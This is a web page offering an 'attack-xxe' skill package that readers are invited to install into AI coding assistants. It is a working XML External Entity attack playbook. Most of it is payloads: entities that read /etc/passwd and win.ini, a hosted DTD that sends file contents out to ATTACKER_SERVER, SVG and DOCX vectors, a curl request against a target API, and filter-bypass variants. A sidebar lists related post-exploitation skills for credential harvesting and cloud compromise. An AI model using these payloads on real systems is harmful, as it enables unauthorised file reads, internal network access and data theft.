Menu
XML External Entity injection — file read, SSRF, data exfiltration via out-of-band XML parsing
Install with Codex or Claude Copy this prompt, paste it into Codex, Claude, or another assistant, and let it review the skill page and install it for you.
Based on SOC occupation classification
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-xxe |
| description | XML External Entity injection — file read, SSRF, data exfiltration via out-of-band XML parsing |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["xxe","xml","injection","web","attack"] |
| tech_stack | ["web","java","php","dotnet"] |
| cwe_ids | ["CWE-611","CWE-827"] |
| chains_with | ["attack-ssrf"] |
| prerequisites | [] |
| severity_boost | {"attack-ssrf":"XXE + SSRF = internal network access via XML parser"} |
Exploit XML parsing vulnerabilities to read local files, perform SSRF, or exfiltrate data via out-of-band channels.
Look for endpoints accepting:
Content-Type: application/xml or text/xml.asmx, .wsdl)<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
Windows targets:
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://ATTACKER_SERVER/xxe.dtd">
%xxe;
]>
<root>test</root>
Hosted DTD (xxe.dtd):
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://ATTACKER_SERVER/?data=%file;'>">
%eval;
%exfil;
Use the SSRF listener for callback detection:
attack_script ssrf_listener -p 8888 -o xxe_hits.json
SVG:
<?xml version="1.0"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text>&xxe;</text>
</svg>
DOCX: Modify [Content_Types].xml or word/document.xml inside the ZIP.
# Switch JSON endpoint to XML
curl -X POST https://TARGET/api/data \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % a "<!ENTITY xxe SYSTEM 'file:///etc/passwd'>">
%a;
]>
<root>&xxe;</root>
| Finding | Severity |
|---|---|
| File contents read (e.g., /etc/passwd) | Critical (P1) |
| Out-of-band DNS/HTTP callback | High (P2) |
| SSRF via XXE | High (P2) |
| Denial of Service (billion laughs) | Medium (P3) |
| Error-based file path disclosure | Low (P4) |
attack_script ssrf_listener — OOB callback listener for blind XXEattack_script file_upload_tester — SVG XXE via upload